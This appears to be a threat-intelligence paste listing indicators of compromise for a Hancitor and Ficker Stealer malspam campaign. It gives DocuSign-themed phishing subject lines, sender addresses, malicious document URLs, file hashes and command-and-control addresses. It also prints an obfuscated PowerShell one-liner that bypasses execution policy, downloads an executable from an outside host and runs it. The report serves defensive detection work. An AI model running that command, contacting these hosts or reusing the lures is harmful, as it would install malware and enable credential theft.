View difference between Paste ID: YwBxTDwX and kmUJ3pX6
THREAT IDENTIFICATION: HANCITOR / FICKER STEALER

HANCITOR BUILD NUMBER
BUILD=0707in2_wvcr

SUBJECTS OBSERVED
You got invoice from DocuSign Electronic Service
You got invoice from DocuSign Electronic Signature Service
You got invoice from DocuSign Service
You got invoice from DocuSign Signature Service
You got notification from DocuSign Electronic Service
You got notification from DocuSign Electronic Signature Service
You got notification from DocuSign Service
You got notification from DocuSign Signature Service
You received invoice from DocuSign Electronic Service
You received invoice from DocuSign Electronic Signature Service
You received invoice from DocuSign Service
You received invoice from DocuSign Signature Service
You received notification from DocuSign Electronic Service
You received notification from DocuSign Electronic Signature Service
You received notification from DocuSign Service
You received notification from DocuSign Signature Service

SENDERS OBSERVED
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

MALDOC PROXY DISTRIBUTION URLS
http://feedproxy.google.com/~r/aadrkvpwohr/~3/hvqIAWB8ZGo/legend.php
http://feedproxy.google.com/~r/aaigmlntaz/~3/zDMjq9cpjP0/purported.php
http://feedproxy.google.com/~r/agrfofpkhoi/~3/Nvuc4ZHoAuU/trafficked.php
http://feedproxy.google.com/~r/aoqdbq/~3/lgYeMYdoVFs/edelweiss.php
http://feedproxy.google.com/~r/bcoycuchq/~3/85TxsQt3Q1A/expatiate.php
http://feedproxy.google.com/~r/bfaiobxnn/~3/40BvVc5LU1I/nondestructive.php
http://feedproxy.google.com/~r/ccfhf/~3/YPVRRIvUyF0/detrition.php
http://feedproxy.google.com/~r/conikypz/~3/zYdenqefeFM/polemic.php
http://feedproxy.google.com/~r/eapqs/~3/PXLELUQiOIM/enabled.php
http://feedproxy.google.com/~r/eaxffuyn/~3/MPqSB8haPFM/pointedness.php
http://feedproxy.google.com/~r/efuzvpwwuw/~3/Ju_TpdCJw7o/trover.php
http://feedproxy.google.com/~r/ggwrkvfiz/~3/5AZsEWUuj0w/wrath.php
http://feedproxy.google.com/~r/gidppccnezk/~3/8yvHqCvJiiA/limp.php
http://feedproxy.google.com/~r/higcitfx/~3/rrnrD2uQluU/funny.php
http://feedproxy.google.com/~r/huwwygzkokv/~3/3N-X0bO5epU/isle.php
http://feedproxy.google.com/~r/igxzzrinx/~3/Z97ozNdjlSA/siderite.php
http://feedproxy.google.com/~r/kkyknzxqa/~3/OSA0nIazKI4/presumed.php
http://feedproxy.google.com/~r/lfmzx/~3/DIfbI5M9auQ/schoolmarm.php
http://feedproxy.google.com/~r/mezzzkrooh/~3/gM2AilSs-2U/witnesser.php
http://feedproxy.google.com/~r/oehvfutz/~3/J8P7yN6ucko/toothless.php
http://feedproxy.google.com/~r/ogitcfzsl/~3/5Psg9vP0R7k/sleekness.php
http://feedproxy.google.com/~r/oivbslq/~3/8sJ-OEQ-QKk/sinned.php
http://feedproxy.google.com/~r/puyhr/~3/c91Mx9dCypw/tuba.php
http://feedproxy.google.com/~r/qvdii/~3/lgxzfGdyDyo/greeting.php
http://feedproxy.google.com/~r/reibxjjfqv/~3/YHK3BGNsq0Q/tangibly.php
http://feedproxy.google.com/~r/rtiuexidp/~3/L0TOvxtMT4E/aboard.php
http://feedproxy.google.com/~r/sjsovniji/~3/j9cG3K3J4SU/interpretation.php
http://feedproxy.google.com/~r/slcqfyy/~3/IPa4MfWbIUs/practitioner.php
http://feedproxy.google.com/~r/sxdcbtwtun/~3/CKI5VDNqNpM/versification.php
http://feedproxy.google.com/~r/vmfctlny/~3/0kW56lAJalM/firmament.php
http://feedproxy.google.com/~r/vtvqpysqgjx/~3/sG4SsBpOZNM/monument.php
http://feedproxy.google.com/~r/wwenrdi/~3/ZVOWXtVkwCo/antimatter.php
http://feedproxy.google.com/~r/ymtonk/~3/e2Kt7bOAP10/cutlass.php

MALDOC REDIRECT DOWNLOAD URLS
http://an.nastena.lv/greeting.php
http://catface.us/expatiate.php
http://gbsports.theapplab.org/tuba.php
http://gbsports.theapplab.org/wrath.php
http://grecozenobi.com.ar/presumed.php
http://grecozenobi.com.ar/sinned.php
http://grecozenobi.com.ar/trover.php
http://greechip.net/polemic.php
http://gunsify.com/sleekness.php
http://homevault.co.uk/aboard.php
http://homevault.co.uk/enabled.php
http://jaxthemessenger.com/witnesser.php
http://maoptions.xyz/detrition.php
http://maoptions.xyz/monument.php
http://maoptions.xyz/trafficked.php
http://new.novapilates.com/versification.php
http://nextclickcorp.net/nondestructive.php
http://nextclickcorp.net/practitioner.php
http://pphc.welkinfortprojects.com/edelweiss.php
http://pphc.welkinfortprojects.com/limp.php
http://seatranscorp.com/cutlass.php
http://seatranscorp.com/purported.php
http://seatranscorp.com/toothless.php
http://sportsrunouts.com/antimatter.php
http://sportsrunouts.com/isle.php
http://sportsrunouts.com/tangibly.php
http://turquoisecoaching.co.uk/funny.php
http://turquoisecoaching.co.uk/pointedness.php
http://virfilms.in/interpretation.php
http://virfilms.in/siderite.php
http://vivo.com.pk/firmament.php
https://www.adstudiophotography.com/legend.php
https://www.adstudiophotography.com/schoolmarm.php

adstudiophotography.com
catface.us
grecozenobi.com.ar
greechip.net
gunsify.com
homevault.co.uk
jaxthemessenger.com
maoptions.xyz
nastena.lv
nextclickcorp.net
novapilates.com
seatranscorp.com
sportsrunouts.com
theapplab.org
turquoisecoaching.co.uk
virfilms.in
vivo.com.pk
welkinfortprojects.com

MALDOC XLL FILE HASHES
0708_891792481.xll
41e0318dfdb1c180a375a7efc712649e

MALDOC DOC FILE HASHES
46b5387cedf436ebd2c0800f2e8297e2
4bdfb6932eba2bb3cbce59a2bae3cee2
aec795705d76fe4e3a66adbace539656
b4144d8e8e735f9a24f8c6e043438077
d32db402317d36e8a207d5b5a71d6cac
e071a5ed02d41002303b7e5763bfb307

HANCITOR PAYLOAD DOWNLOAD URLS
(this proceeded from running the .xll file)
http://srand04rf.ru/92375234.xml
http://srand04rf.ru/08.jpg

HANCITOR PAYLOAD FILE HASH
(as usual, this was dropped after enabling macros in the .doc file)
niberius.dll
378d5008e351365908e039475b7180b0

POWERSHELL SCRIPT FROM OPENING THE XLL FILE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg' -OuTfIle 'c:\Users\Public\snd32sys.exe';
sTart 'c:\Users\Public\snd32sys.exe'

(this proceeded from running the .xll file)
92375234.xml
71999a9d2f15e164c9b1fa926aa6444b

res32.hta (same hash)
71999a9d2f15e164c9b1fa926aa6444b
----------------------------------------
08.jpg
ed1921467f6784af6bdca40a06a541b5

snd32sys.exe (same hash)
ed1921467f6784af6bdca40a06a541b5

HANCITOR C2
http://anspossthrly.ru/8/forum.php
http://sudepallon.com/8/forum.php
http://thentabecon.ru/8/forum.php

FICKER STEALER DOWNLOAD URL
http://srand04rf.ru/7hfjsdfjks.exe

FICKER STEALER FILE HASH
7hfjsdfjks.exe
270c3859591599642bd15167765246e3

FICKER C2
http://pospvisis.com